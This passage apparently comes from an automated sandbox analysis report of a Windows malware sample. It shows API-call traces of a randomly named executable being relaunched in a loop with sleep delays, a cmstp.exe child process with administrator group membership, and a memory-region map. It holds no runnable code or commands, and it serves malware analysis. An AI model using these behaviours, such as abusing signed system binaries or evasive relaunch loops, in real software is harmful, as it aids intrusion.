HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0202.906] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65500) returned 1 [0202.906] NtClose (Handle=0x1d3c) returned 0x0 [0202.908] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x1cf4, hThread=0x1d3c, dwProcessId=0x1234, dwThreadId=0x10dc), hNewToken=0x0) returned 1 [0202.924] Sleep (dwMilliseconds=0x1388) [0202.926] Sleep (dwMilliseconds=0x1388) [0202.928] Sleep (dwMilliseconds=0x1388) [0202.931] Sleep (dwMilliseconds=0x1388) [0202.932] Sleep (dwMilliseconds=0x1388) [0202.933] Sleep (dwMilliseconds=0x1388) [0202.935] Sleep (dwMilliseconds=0x1388) [0202.936] Sleep (dwMilliseconds=0x1388) [0202.938] Sleep (dwMilliseconds=0x1388) [0202.939] Sleep (dwMilliseconds=0x1388) [0202.944] Sleep (dwMilliseconds=0x1388) [0202.946] Sleep (dwMilliseconds=0x1388) [0202.948] Sleep (dwMilliseconds=0x1388) [0202.949] Sleep (dwMilliseconds=0x1388) [0202.951] Sleep (dwMilliseconds=0x1388) [0202.964] Sleep (dwMilliseconds=0x1388) [0202.965] Sleep (dwMilliseconds=0x1388) [0202.967] Sleep (dwMilliseconds=0x1388) [0202.968] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.968] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1cec, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0202.968] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0202.968] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64f00) returned 1 [0202.968] NtQueryInformationFile (in: FileHandle=0x1cec, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0202.968] NtClose (Handle=0x1cec) returned 0x0 [0202.969] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.969] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1cec, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0202.969] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0202.969] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65800) returned 1 [0202.969] NtClose (Handle=0x1cec) returned 0x0 [0202.971] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x1cfc, hThread=0x1cec, dwProcessId=0x10f4, dwThreadId=0x10b4), hNewToken=0x0) returned 1 [0202.986] Sleep (dwMilliseconds=0x1388) [0202.987] Sleep (dwMilliseconds=0x1388) [0202.989] Sleep (dwMilliseconds=0x1388) [0202.992] Sleep (dwMilliseconds=0x1388) [0202.993] Sleep (dwMilliseconds=0x1388) [0202.995] Sleep (dwMilliseconds=0x1388) [0202.997] Sleep (dwMilliseconds=0x1388) [0202.998] Sleep (dwMilliseconds=0x1388) [0203.000] Sleep (dwMilliseconds=0x1388) [0203.002] Sleep (dwMilliseconds=0x1388) [0203.003] Sleep (dwMilliseconds=0x1388) [0203.008] Sleep (dwMilliseconds=0x1388) [0203.030] Sleep (dwMilliseconds=0x1388) [0203.031] Sleep (dwMilliseconds=0x1388) [0203.033] Sleep (dwMilliseconds=0x1388) [0203.034] Sleep (dwMilliseconds=0x1388) [0203.036] Sleep (dwMilliseconds=0x1388) [0203.038] Sleep (dwMilliseconds=0x1388) [0203.039] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.039] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1a0c, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0203.039] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0203.039] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65c80) returned 1 [0203.039] NtQueryInformationFile (in: FileHandle=0x1a0c, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0203.039] NtClose (Handle=0x1a0c) returned 0x0 [0203.039] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.039] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1a0c, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0203.040] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0203.040] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64300) returned 1 [0203.040] NtClose (Handle=0x1a0c) returned 0x0 [0203.046] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x1224, hThread=0x1a0c, dwProcessId=0x1398, dwThreadId=0x10bc), hNewToken=0x0) returned 1 [0203.057] Sleep (dwMilliseconds=0x1388) [0203.060] Sleep (dwMilliseconds=0x1388) [0203.062] Sleep (dwMilliseconds=0x1388) [0203.064] Sleep (dwMilliseconds=0x1388) [0203.065] Sleep (dwMilliseconds=0x1388) [0203.067] Sleep (dwMilliseconds=0x1388) [0203.068] Sleep (dwMilliseconds=0x1388) [0204.277] Sleep (dwMilliseconds=0x1388) Thread: id = 74 os_tid = 0xd8c Thread: id = 75 os_tid = 0xe68 Thread: id = 76 os_tid = 0xcc0 Thread: id = 77 os_tid = 0xeec Thread: id = 78 os_tid = 0xa2c Thread: id = 79 os_tid = 0xed8 Thread: id = 80 os_tid = 0xbf0 Thread: id = 81 os_tid = 0x2f8 Thread: id = 82 os_tid = 0x1100 Thread: id = 212 os_tid = 0xd18 Process: id = "4" image_name = "cmstp.exe" filename = "c:\\windows\\syswow64\\cmstp.exe" page_root = "0x180f7000" os_pid = "0x3f8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Windows\\SysWOW64\\cmstp.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 863 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 864 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 865 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 866 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 867 start_va = 0xa0000 end_va = 0xdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 868 start_va = 0xe0000 end_va = 0xe3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 869 start_va = 0xf0000 end_va = 0xf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 870 start_va = 0x100000 end_va = 0x101fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 871 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 872 start_va = 0x1090000 end_va = 0x10a6fff monitored = 1 entry_point = 0x10a1740 region_type = mapped_file name = "cmstp.exe" filename = "\\Windows\\SysWOW64\\cmstp.exe" (normalized: "c:\\windows\\syswow64\\cmstp.exe") Region: id = 873 start_va = 0x10b0000 end_va = 0x50affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010b0000" filename = "" Region: id = 874 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 875 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 876 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 877 start_va = 0x7fff0000 end_va = 0x7dfc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 878 start_va = 0x7dfc5f810000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc5f810000" filename = "" Region: id = 879 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 880 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 887 start_va = 0x110000 end_va = 0x138fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 889 start_va = 0x1090000 end_va = 0x10a6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001090000" filename = "" Region: id = 890 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 891 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 892 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 893 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 894 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 895 start_va = 0x510000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 896 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 897 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 898 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 899 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 900 start_va = 0x140000 end_va = 0x1fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 901 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 902 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 903 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 904 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 905 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 906 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 907 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 908 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 909 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 910 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 911 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 912 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 913 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 914 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 915 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 916 start_va = 0x480000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 917 start_va = 0x4c0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 918 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 919 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 920 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 921 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 922 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 923 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 924 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 925 start_va = 0x6c5c0000 end_va = 0x6c5c7fff monitored = 0 entry_point = 0x6c5c17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 926 start_va = 0x6c5d0000 end_va = 0x6c5defff monitored = 0 entry_point = 0x6c5d8630 region_type = mapped_file name = "cmutil.dll" filename = "\\Windows\\SysWOW64\\cmutil.dll" (normalized: "c:\\windows\\syswow64\\cmutil.dll") Region: id = 927 start_va = 0x770000 end_va = 0x8effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 928 start_va = 0x510000 end_va = 0x539fff monitored = 0 entry_point = 0x515680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 929 start_va = 0x670000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 930 start_va = 0x8f0000 end_va = 0xa77fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 931 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 932 start_va = 0xa80000 end_va = 0xc00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a80000" filename = "" Region: id = 933 start_va = 0x50b0000 end_va = 0x64affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000050b0000" filename = "" Region: id = 934 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 935 start_va = 0x510000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 936 start_va = 0x520000 end_va = 0x524fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmstp.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\cmstp.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\cmstp.exe.mui") Region: id = 937 start_va = 0x530000 end_va = 0x530fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 938 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 939 start_va = 0x550000 end_va = 0x5e0fff monitored = 0 entry_point = 0x588cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 940 start_va = 0xc10000 end_va = 0xd89fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 941 start_va = 0xd90000 end_va = 0xf17fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d90000" filename = "" Region: id = 942 start_va = 0x64b0000 end_va = 0x67a9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000064b0000" filename = "" Region: id = 943 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 944 start_va = 0x560000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 945 start_va = 0x770000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 946 start_va = 0x8e0000 end_va = 0x8effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008e0000" filename = "" Region: id = 1047 start_va = 0x770000 end_va = 0x798fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Region: id = 1048 start_va = 0x7a0000 end_va = 0x7c8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1049 start_va = 0x7d0000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 1050 start_va = 0xc10000 end_va = 0xc9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 1051 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1052 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1053 start_va = 0x67b0000 end_va = 0x8307fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000067b0000" filename = "" Region: id = 1054 start_va = 0xca0000 end_va = 0xe94fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ca0000" filename = "" Region: id = 1055 start_va = 0x8310000 end_va = 0x8504fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008310000" filename = "" Region: id = 1057 start_va = 0x880000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 1058 start_va = 0xea0000 end_va = 0xedffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ea0000" filename = "" Region: id = 1059 start_va = 0xee0000 end_va = 0xf0cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ee0000" filename = "" Region: id = 1060 start_va = 0x701a0000 end_va = 0x703acfff monitored = 0 entry_point = 0x7028acb0 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 1065 start_va = 0xf10000 end_va = 